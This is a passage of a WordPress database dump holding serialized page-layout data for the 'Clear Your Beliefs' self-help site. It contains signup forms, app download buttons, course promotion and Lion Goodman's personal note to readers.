Practitioner Training[/su_button]</p>\n\n\n<hr id="lines"/>\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:7:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:9:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}}}'),
(1414, 1853, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:115:"<img class="img-responsive"  src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" />";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:164:"<center>\n<div class=''embed-container''>\n     <iframe src=''//player.vimeo.com/video/109282065?autoplay=1'' frameborder=''0'' allowfullscreen></iframe>\n</div>\n</center>\n\n";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1466:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-bottom: -30px; margin-top: 15px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" /></center>\n<p class="tri-panel-p tri-panel-1st-p" style="text-align: center; padding-top: 30px !important; margin: 0px;"><strong>Download the free eBook.</strong></p>\n\n<form class="infusion-form" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/54657fac17ff5d88bb7ea5db95ab4742" method="POST" name="inf_form_xid"><input name="inf_form_name" type="hidden" value="Sign up for free �Clear Your Beliefs�eBook" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="infusion-field"><label class="form-label" for="inf_field_FirstName">FIRST NAME *</label>\n<input required id="inf_field_FirstName" class="form-input" name="inf_field_FirstName" type="text" /></div>\n<div class="infusion-field"><label class="form-label" for="inf_field_Email">EMAIL *</label>\n<input required id="inf_field_Email" class="form-input" name="inf_field_Email" type="text" /></div>\n<div class="form-input-container-button"><input class="form-input-button" type="submit" value="GET ACCESS NOW" /></div>\n</form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2149:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-bottom: -27px; margin-top: 15px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iclearit-App-logo_600-260x300.jpg" alt="download" width="89" height="87" /></center>\n<p class="tri-panel-p tri-panel-2nd-p-1" style="text-align: center; margin-top: 32px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p class="tri-panel-p tri-panel-2nd-p-2" style="text-align: center; font-size: 14px; margin-bottom: -2px; padding:0 5px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\n<form style="position: relative; top: 10px ! important;" class="infusion-form nd-form-1" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/95b50364c9028abe58d1cf438ba1ed6c" method="POST"><input name="inf_form_xid" type="hidden" value="95b50364c9028abe58d1cf438ba1ed6c" /><input name="inf_form_name" type="hidden" value="Click �Download iphone APP" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="form-input-container-button" style="padding: 0px !important;"><input class="form-input-button" type="submit" value="DOWNLOAD iPHONE APP" /></div>\n</form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n<form style="position: relative; bottom: -2px ! important;" class="infusion-form nd-form-1" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/4d653090e9a0295e74e12ab5dff702ae" method="POST"><input name="inf_form_xid" type="hidden" value="4d653090e9a0295e74e12ab5dff702ae" /><input name="inf_form_name" type="hidden" value="Click �Download iPAD APP" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" /> \n\n<div class="form-input-container-button" style="padding: 0px !important;"><input class="form-input-button" type="submit" value="DOWNLOAD iPAD APP" /></div>\n\n</form>\n\n<script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1459:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]\n<div style="height: auto; width: 100%;"><img style="margin-top: 0px !important; width: 100% !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/11/cyb-3rd-head.jpg" alt="" />\n\n<p class="tri-panel-p tri-panel-3rd-p" style="text-align: center; margin-top: 10px; font-size: 16px;"><big><strong><u>Clear Your Limiting</u>\nand Negative Beliefs</strong></big> <big><strong>\n- Permanently!</strong></big>\n\n<p class="tri-panel-p tri-panel-3rd-p-2" style="text-align: center; font-size: 14px; margin-bottom: -2px; padding:0 5px;">A 7-week journey into your\nsubconscious mind to delete the beliefs that hold you back.\n\n<form target="_blank" class="infusion-form rd-form-1 rd-form-1-3rd" style="position: relative; bottom: 15px;" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/af866427c80f3c42fbfe2df24442de38" method="POST"><input name="inf_form_xid" type="hidden" value="af866427c80f3c42fbfe2df24442de38" /><input name="inf_form_name" type="hidden" value="Click IClearit�&quot;Learn More&quot;" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="form-input-container-button"><input class="form-input-button" type="submit" value="LEARN MORE" /></div>\n</form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>[/su_box]\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1417:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n[su_row][su_column size="1/2"]\n<ul style="margin-left: 25px;">\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<h2>How and Why It Works So Well</h2>\n<ul style="margin-left: 26px;">\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2893:"<div id="divStroke">\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n<ul style="margin-left: 25px;">\n	<li><em style="margin-left: -6px;">What do I want to experience?</em></li>\n	<li><em style="margin-left: -6px;">What belief is creating this experience I don''t want?</em></li>\n	<li><em style="margin-left: -6px;">How can I change my belief so I can change my experience?</em></li>\n</ul>\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt.</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:542:"<div id="divStroke2">\n<h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3>\n<p style="text-align: center; margin: 0px 5%;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p>\n<p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p>\n\n\n<hr id="lines"/>\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:7:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:9:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}}}'),
(1646, 2071, 'panels_data', 'a:0:{}'),
(1644, 2071, '_edit_last', '2'),
(1643, 2071, '_edit_lock', '1517895678:2'),
(1568, 2020, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:115:"<img class="img-responsive"  src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" />";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:164:"<center>\n<div class=''embed-container''>\n     <iframe src=''//player.vimeo.com/video/109282065?autoplay=1'' frameborder=''0'' allowfullscreen></iframe>\n</div>\n</center>\n\n";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1461:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-bottom: -30px; margin-top: 15px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" /></center>\n<p class="tri-panel-p tri-panel-1st-p" style="text-align: center; padding-top: 30px !important; margin: 0px;"><strong>Get the free eBook.</strong></p>\n\n<form class="infusion-form" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/54657fac17ff5d88bb7ea5db95ab4742" method="POST" name="inf_form_xid"><input name="inf_form_name" type="hidden" value="Sign up for free �Clear Your Beliefs�eBook" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="infusion-field"><label class="form-label" for="inf_field_FirstName">FIRST NAME *</label>\n<input required id="inf_field_FirstName" class="form-input" name="inf_field_FirstName" type="text" /></div>\n<div class="infusion-field"><label class="form-label" for="inf_field_Email">EMAIL *</label>\n<input required id="inf_field_Email" class="form-input" name="inf_field_Email" type="text" /></div>\n<div class="form-input-container-button"><input class="form-input-button" type="submit" value="GET ACCESS NOW" /></div>\n</form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1696:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n<center style="margin-bottom: -27px; margin-top: -7px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iclearit-App-logo_FINAL-246x300.jpg" alt="download" width="89" height="87" /></center>\n<p class="tri-panel-p tri-panel-2nd-p-1" style="text-align: center; margin-top: 32px;"><strong>Download the Free App</strong><br />for iPhone & iPad</p>\n<p class="tri-panel-p tri-panel-2nd-p-2" style="text-align: center; font-size: 14px; margin-bottom: -4px; padding:0 5px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\n<form style="position: relative; top: 10px ! important;" class="infusion-form nd-form-1" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/95b50364c9028abe58d1cf438ba1ed6c" method="POST"><input name="inf_form_xid" type="hidden" value="95b50364c9028abe58d1cf438ba1ed6c" /><input name="inf_form_name" type="hidden" value="Click �Download iphone APP" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="form-input-container-button" style="padding: 0px !important;"><input class="form-input-button" type="submit" value="Download the App" /></div>\n</form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n\n<script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n<p class="tri-panel-p tri-panel-2nd-p-2" style="text-align: center; font-size: 14px; margin-bottom: -4px; padding:0 5px;">FREE (for a limited time)</p>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1452:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]\n<div style="height: auto; width: 100%;"><img style="margin-top: 0px !important; width: 100% !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/11/cyb-3rd-head.jpg" alt="" />\n\n<p class="tri-panel-p tri-panel-3rd-p" style="text-align: center; margin-top: 10px; font-size: 16px;"><big><strong>Clear Your Limiting\nand Negative Beliefs</strong></big> <big><strong>\n- Permanently!</strong></big>\n\n<p class="tri-panel-p tri-panel-3rd-p-2" style="text-align: center; font-size: 14px; margin-bottom: -2px; padding:0 5px;">A 7-week journey into your\nsubconscious mind to delete the beliefs that hold you back.\n\n<form target="_blank" class="infusion-form rd-form-1 rd-form-1-3rd" style="position: relative; bottom: 15px;" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/af866427c80f3c42fbfe2df24442de38" method="POST"><input name="inf_form_xid" type="hidden" value="af866427c80f3c42fbfe2df24442de38" /><input name="inf_form_name" type="hidden" value="Click IClearit�&quot;Learn More&quot;" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="form-input-container-button"><input class="form-input-button" type="submit" value="LEARN MORE" /></div>\n</form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>[/su_box]\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1417:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n[su_row][su_column size="1/2"]\n<ul style="margin-left: 25px;">\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<h2>How and Why It Works So Well</h2>\n<ul style="margin-left: 26px;">\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2893:"<div id="divStroke">\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n<ul style="margin-left: 25px;">\n	<li><em style="margin-left: -6px;">What do I want to experience?</em></li>\n	<li><em style="margin-left: -6px;">What belief is creating this experience I don''t want?</em></li>\n	<li><em style="margin-left: -6px;">How can I change my belief so I can change my experience?</em></li>\n</ul>\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt.</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:542:"<div id="divStroke2">\n<h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3>\n<p style="text-align: center; margin: 0px 5%;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p>\n<p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p>\n\n\n<hr id="lines"/>\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:7:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:9:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}}}'),
(1446, 1862, '_wp_attached_file', '2014/10/iclearit-App-logo_FINAL.jpg'),
(1447, 1862, '_wp_attachment_metadata', 'a:5:{s:5:"width";i:300;s:6:"height";i:365;s:4:"file";s:35:"2014/10/iclearit-App-logo_FINAL.jpg";s:5:"sizes";a:4:{s:9:"thumbnail";a:4:{s:4:"file";s:35:"iclearit-App-logo_FINAL-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:35:"iclearit-App-logo_FINAL-246x300.jpg";s:5:"width";i:246;s:6:"height";i:300;s:9:"mime-type";s:10:"image/jpeg";}s:14:"category-thumb";a:4:{s:4:"file";s:35:"iclearit-App-logo_FINAL-220x220.jpg";s:5:"width";i:220;s:6:"height";i:220;s:9:"mime-type";s:10:"image/jpeg";}s:15:"product-preview";a:4:{s:4:"file";s:35:"iclearit-App-logo_FINAL-170x200.jpg";s:5:"width";i:170;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:10:{s:8:"aperture";i:0;s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";i:0;s:9:"copyright";s:0:"";s:12:"focal_length";i:0;s:3:"iso";i:0;s:13:"shutter_speed";i:0;s:5:"title";s:0:"";}}');
INSERT INTO `cyb_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(1450, 1865, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:115:"<img class="img-responsive"  src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" />";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:164:"<center>\n<div class=''embed-container''>\n     <iframe src=''//player.vimeo.com/video/109282065?autoplay=1'' frameborder=''0'' allowfullscreen></iframe>\n</div>\n</center>\n\n";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1466:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-bottom: -30px; margin-top: 15px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" /></center>\n<p class="tri-panel-p tri-panel-1st-p" style="text-align: center; padding-top: 30px !important; margin: 0px;"><strong>Download the free eBook.</strong></p>\n\n<form class="infusion-form" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/54657fac17ff5d88bb7ea5db95ab4742" method="POST" name="inf_form_xid"><input name="inf_form_name" type="hidden" value="Sign up for free �Clear Your Beliefs�eBook" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div 